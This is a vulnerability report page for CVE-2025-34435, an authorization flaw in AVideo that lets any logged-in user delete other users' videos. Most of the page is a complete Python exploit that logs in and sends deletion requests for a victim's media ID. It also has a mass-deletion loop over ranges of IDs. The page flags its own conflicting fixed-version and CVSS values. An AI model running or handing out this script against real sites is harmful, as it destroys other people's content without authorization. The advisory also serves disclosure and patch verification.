Security Vulnerability Report
CVE-2025-34435 CVSS 6.5 MEDIUM

CVE-2025-34435

Published: 2025-12-17 20:15:54
Last Modified: 2025-12-19 19:15:51

Description

AVideo versions prior to 20.1 are vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
AVideo < 20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-34435 PoC - AVideo IDOR Arbitrary File Deletion

Demonstrates the missing-authorization defect described in the advisory: an
authenticated session POSTs a media ``id`` to ``objects/mediaDelete.json.php``
and the pre-fix server deletes it without checking that the session owns the
video or holds edit permission for it (CWE-639, authorization bypass through a
user-controlled key).

Fix (server side): before deleting, check that the requesting user owns the
video or has edit permission for it and reject the request otherwise; the two
patch commits referenced in this report are the upstream changes to compare
against.

NOTE(review): this page is internally inconsistent about the fixed version --
the description says "prior to 20.1" while the NVD configuration lists
``versionEndExcluding`` 20.0 -- and the CVSS 3.1 vector (C:N/I:H/A:N, 6.5)
disagrees with the CVSS 4.0 vector (VC:H/VI:H/VA:H, 8.7). Confirm the boundary
against the referenced patch commits before using either value for triage.

Script notes: ``json`` and ``Optional`` are imported but never used; every
network error is swallowed by ``except Exception`` and reported only via
``print``, so callers get a bare ``False`` with no exception type to act on.
"""
import requests
import json
from typing import Optional, Dict


class AVideoIDORExploit:
    """
    Thin wrapper around a ``requests.Session`` against one AVideo instance.

    State: ``target_url`` (trailing slash stripped), the credentials used by
    ``login()``, the shared session (cookies persist across calls) and the
    ``logged_in`` flag that ``delete_media()`` checks before sending anything.
    """

    def __init__(self, target_url: str, username: str, password: str) -> None:
        # rstrip('/') so the f-string URLs below never produce a double slash.
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        # One session for the whole run: the login cookie set here is what
        # makes the later delete request "authenticated".
        self.session = requests.Session()
        self.logged_in = False

    def login(self) -> bool:
        """
        Authenticate to the AVideo platform via ``login.json``.

        Returns True only when the response is HTTP 200 and its JSON body has
        ``status == 'success'``; any other status code, any other body, and
        any exception (network error, non-JSON body) yield False. On success
        ``self.logged_in`` is set so ``delete_media()`` will proceed.
        """
        login_url = f"{self.target_url}/login.json"
        data = {
            'user': self.username,
            'pass': self.password
        }
        try:
            response = self.session.post(login_url, data=data, timeout=10)
            if response.status_code == 200:
                result = response.json()
                if result.get('status') == 'success':
                    self.logged_in = True
                    print(f"[+] Successfully logged in as {self.username}")
                    return True
            # Reached for a non-200 status or a 200 whose status is not 'success'.
            print("[-] Login failed")
            return False
        except Exception as e:
            # Broad catch: response.json() on a non-JSON body and any
            # requests exception land here and are reported as a plain False.
            print(f"[-] Login error: {e}")
            return False

    def delete_media(self, media_id: int) -> bool:
        """
        Request deletion of one media item by numeric ID.

        Sends ``{'id': media_id}`` to ``objects/mediaDelete.json.php`` using
        the logged-in session. On an unpatched server the deletion succeeds
        regardless of who owns the video (the IDOR); on a fixed server the
        same request is expected to be refused for videos the session does
        not own or may not edit. Returns True only for HTTP 200 with
        ``status == 'success'``; returns False (never raises) otherwise,
        printing the server's ``msg`` field when one is present.

        Requires ``login()`` to have succeeded first.
        """
        if not self.logged_in:
            print("[-] Not logged in. Call login() first.")
            return False
        delete_url = f"{self.target_url}/objects/mediaDelete.json.php"
        data = {'id': media_id}
        try:
            response = self.session.post(delete_url, data=data, timeout=10)
            if response.status_code == 200:
                result = response.json()
                if result.get('status') == 'success':
                    print(f"[+] Successfully deleted media ID: {media_id}")
                    return True
                else:
                    # 'msg' is whatever the server returned; a patched server
                    # reporting a permission failure would surface here.
                    print(f"[-] Failed to delete media ID: {media_id} - {result.get('msg', 'Unknown error')}")
                    return False
            # Non-200 responses are treated as failure without reading the body.
            return False
        except Exception as e:
            print(f"[-] Delete error: {e}")
            return False

    def mass_delete(self, start_id: int, end_id: int) -> Dict:
        """
        Call ``delete_media()`` once for every ID in ``[start_id, end_id]``.

        Sequential, one POST per ID, no back-off and no early stop: every ID
        in the range is attempted even after repeated failures. Returns
        ``{'success': n, 'failed': m}`` with ``n + m`` equal to the size of
        the range (empty range when ``end_id < start_id``).

        Defender note (inferred, not shown by the code): the resulting
        traffic is one session issuing many ``mediaDelete.json.php`` requests
        across consecutive IDs in a short window, which is the pattern to
        alert on and rate-limit server side.
        """
        results = {'success': 0, 'failed': 0}
        for media_id in range(start_id, end_id + 1):
            if self.delete_media(media_id):
                results['success'] += 1
            else:
                results['failed'] += 1
        return results


if __name__ == "__main__":
    # Configuration -- all values below are placeholders from the report,
    # not real hosts, accounts or IDs.
    TARGET = "https://target-avideo-site.com"
    USERNAME = "[email protected]"
    PASSWORD = "password123"
    TARGET_MEDIA_ID = 12345  # Victim's media ID

    # Initialize exploit
    exploit = AVideoIDORExploit(TARGET, USERNAME, PASSWORD)

    # Step 1: Login with attacker account
    if exploit.login():
        # Step 2: Delete victim's media file without ownership
        exploit.delete_media(TARGET_MEDIA_ID)

        # Optional: Mass deletion
        # results = exploit.mass_delete(1, 100)
        # print(f"Results: {results}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34435", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:53.883", "lastModified": "2025-12-19T19:15:50.937", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 are vulnerable to an insecure direct object reference (IDOR) that allows any authenticated user to delete media files belonging to other users. The affected endpoint validates authentication but fails to verify ownership or edit permissions for the targeted video."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/275a54268b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-idor-arbitrary-file-deletion", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}